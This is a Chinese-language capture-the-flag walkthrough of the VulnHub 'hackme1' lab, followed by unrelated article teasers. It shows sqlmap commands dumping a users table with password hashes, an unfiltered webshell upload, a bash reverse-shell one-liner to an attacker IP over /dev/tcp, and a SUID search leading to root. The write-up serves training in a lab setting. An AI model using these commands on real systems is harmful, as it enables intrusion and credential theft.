vulnhub - hackme1

news/2024/10/1 3:27:46

vulnhub - hackme1

信息收集

端口扫描

image-20240613191828379

详细扫描

image-20240613191900797

目录扫描跟漏洞探测没发现什么可用信息,除了登录还有一个uploads目录应该是进入后台之后才能使用

web主页是个登录注册页面,爆了一下admin没进去,随便注册个账户登入

image-20240613192040510

SQL注入

点击search按钮发现是个书本目录,这个结构很容易想到sql注入,是POST查询的

image-20240613192341801

测试成功,sqlmap启动。抓post包存为data.txt

image-20240613193843755

sqlmap -r data.txt --level 3 --dbs --batch[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] webapphackingsqlmap -r data.txt --level 3 -D webapphacking --tables --batch+-------+
| books |
| users |
+-------+sqlmap -r data.txt --level 3 -D webapphacking -T users --columns --batch+---------+----------------------+
| Column  | Type                 |
+---------+----------------------+
| name    | varchar(30)          |
| user    | varchar(30)          |
| address | varchar(50)          |
| id      | smallint(5) unsigned |
| pasword | varchar(70)          |
+---------+----------------------+sqlmap -r data.txt --level 3 -D webapphacking -T users -C name,user,pasword --dump --batch+--------------+------------+---------------------------------------------+
| name         | user       | pasword                                     |
+--------------+------------+---------------------------------------------+
| David        | user1      | 5d41402abc4b2a76b9719d911017c592 (hello)    |
| Beckham      | user2      | 6269c4f71a55b24bad0f0267d9be5508 (commando) |
| anonymous    | user3      | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd) |
| testismyname | test       | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| superadmin   | superadmin | 2386acb2cf356944177746fc92523983            |
| test1        | test1      | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| 123          | test123    | 4297f44b13955235245b2497399d7a93 (123123)   |
+--------------+------------+---------------------------------------------+

查询一下superadmin的明文密码得到Uncrackable

image-20240613194500027

文件上传

登入果然可以文件上传

image-20240613194853842

没有过滤,直接传一个一句话木马,对应文件位置为刚才扫到的uploads目录

image-20240613194928218

反弹shell并提权

蚁剑反弹shell

bash -c 'bash -i >& /dev/tcp/192.168.157.161/9999 0>&1'

image-20240613195411444

使用find查询可以进行suid的文件

find / -perm -u=s -type f 2>/dev/null

发现可疑文件/home/legacy/touchmenot,查看后发现是个二进制文件

image-20240613195932360

直接运行试试

image-20240613200219324

直接提权为root

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hjln.cn/news/45059.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈,一经查实,立即删除!

相关文章

el-upload拍照上传多个文件报错 ERR_UPLOAD_FILE_CHANGED问题

最近同事使用el-upload上传图片时出现一个问题,连续拍照多个图片的时候,循环调用接口上传会报错: ERR_UPLOAD_FILE_CHANGED,网上找了很多方案没有解决,下面是我自己的解决过程。 1. 问题描述我们用的套壳Android,网页发布在远程服务器,Android壳安装在ipad上 前端用的组…

基于蛙跳优化的神经网络数据预测matlab仿真

1.程序功能描述通过蛙跳优化算法,优化神经网络的权值参数,然后使用优化后的神经网络模型对数据进行预测,输出预测曲线。2.测试软件版本以及运行结果展示 MATLAB2022a版本运行 3.核心程序% 数据归一化预处理 Vmin1 = min(X); Vmax1 = max(X); Vmin2 = min(Y…

uni-app在微信小程序端自定义组件中样式穿透失效

前情 uni-app是我比较喜欢的跨平台框架,它能开发小程序/H5/APP(安卓/iOS),重要的是对前端开发友好,自带的IDE让开发体验非常棒,公司项目就是主推uni-app。 坑位 最近因UI有别的事忙,导致手上暂时没什么活了,我于是抽时间优化项目代码,第一件事就是抽取复用组件。正好项目…

ASP.NET Core应用程序10:使用表单标签助手

本章描述用于创建 HTML 表单的内置标签助手。这些标签助手确保表单提交到正确的操作或页面处理程序方法,并确保元素准确地表示特定的模型属性。本章解释 ASP.NET Core 提供的创建 HTML 表单的功能。展示如何使用标签助手来选择表单目标和关联的 imput、textarea 和 select 元素…

m基于PSO-GRU粒子群优化长门控循环单元网络的电力负荷数据预测算法matlab仿真

1.算法仿真效果 matlab2022a仿真结果如下:优化前: 优化后: 对比如下:2.算法涉及理论知识概要基于粒子群优化(Particle Swarm Optimization, PSO)和长门控循环单元(Gated Recurrent Unit, GRU)网络的电力负荷预测算法,是一种融合了优化技术和深度学习的先进预测模型。…

如何更改IIS中应用程序的虚拟路径

这边的虚拟路径查出来配置错了。 显示的是新建的时候的别名。修改目前我这边是删除重新加一个。

kali更换apt镜像

kali更换apt镜像 vim /etc/apt/sources.list进来之后按i进入编辑模式,把其他的镜像#注释掉之后,加上新的镜像,然后esc退出编辑,按:输入wq保存并退出! 上面的办法不知道为啥没用 修改 /etc/apt/sources.list 文件,也即修改镜像源,能够加快在下载和更新相关软件数据;否则…

数据结构与算法1 简要复习

1.三种复杂度 Ο,读音:big-oh;表示上界,小于等于。 Ω,读音:big omega、欧米伽;表示下界,大于等于。 Θ,读音:theta、西塔;既是上界也是下界,称为确界,等于。 2.抽象数据类型 3.堆,栈(queue,stack) 4.哈希线性探测 二次探测(重要) 二次哈希5.二叉搜索树(BS…